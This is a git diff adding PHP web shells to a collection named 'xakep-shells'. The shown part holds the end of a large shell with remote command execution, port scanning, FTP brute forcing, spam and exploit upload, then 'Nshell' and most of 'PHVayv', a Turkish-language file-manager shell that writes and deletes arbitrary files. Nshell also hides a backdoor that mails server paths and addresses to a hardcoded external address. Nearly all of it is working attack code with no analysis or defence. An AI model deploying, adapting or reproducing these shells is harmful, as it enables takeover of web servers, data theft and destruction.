+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/xakep-shells/PHP/Nshell (1).php.php.txt b/xakep-shells/PHP/Nshell (1).php.php.txt
new file mode 100644
index 0000000..1d008b6
--- /dev/null
+++ b/xakep-shells/PHP/Nshell (1).php.php.txt	
@@ -0,0 +1,66 @@
+<?php
+//code by navaro :d
+/***************************************/
+  closelog( );
+/*
+  echo "<center>";
+  $user = get_current_user( ); echo "User :".$user."<br>";
+  $login = posix_getuid( ); echo "Login (Get uid):".$login."<br>";
+  $euid = posix_geteuid( ); echo "Get Euid (geteuid):".$euid."<br>";
+  $ver = phpversion( ); echo "Php version (phpversion) :".$ver."<br>";
+  $gid = posix_getgid( ); echo "Get id (id) :".$gid."<br>";
+  if ($chdir == "") $chdir = getcwd( ); echo "pwd :".$chdir."<br>";
+  if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
+  echo "</center>";
+
+/***************************************/
+function readfiles()
+{
+echo "<form name=pathfile method=post action=".$_SERVER['REQUEST_URI'].">";
+echo "File name : <br><input size=50 name=file type=text".@$_POST['file']."><br>";
+echo "<input type=submit value=Submit></form><hr color=777777 width=100% height=115px>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
+$file=@$_POST['file'];
+if(!@fopen("$file","r")) { echo "File not found";exit();};
+if(@isset($file))
+{
+$fd = @fopen ("$file", "r");
+echo "<center><font face=\"tahoma\" size=\"12\"><TEXTAREA NAME=\"source\" ROWS=\"35\" COLS=\"120\">";
+while (!@feof ($fd)) {
+   $buffer = @fgets($fd);
+   echo htmlspecialchars($buffer);
+}
+@fclose ($fd);
+echo "</TEXTAREA> </font></center>";
+}
+else echo $_SERVER['PHP_SELF']."?file=";
+}
+// Thuc thi command
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function ecmd()
+{
+echo "<FORM name=injection METHOD=POST ACTION=".$_SERVER['REQUEST_URI'].">";
+echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($_POST['cmd']))."><br> <INPUT TYPE=submit></FORM><hr color=777777 width=100% height=115px></font><pre>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+$cmd = @$_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit();
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+echo "</pre>";
+}
+$act=@$_REQUEST['act'];
+if(empty($act))
+{ echo $_SERVER['PHP_SELF']."act=?<br>" ;
+echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+; exit();
+}
+if($act=="cmd") {ecmd();}
+if($act=="readfile") {readfiles();}
+?>
+ 
diff --git a/xakep-shells/PHP/PH Vayv.php.php.txt b/xakep-shells/PHP/PH Vayv.php.php.txt
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/xakep-shells/PHP/PH Vayv.php.php.txt	
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
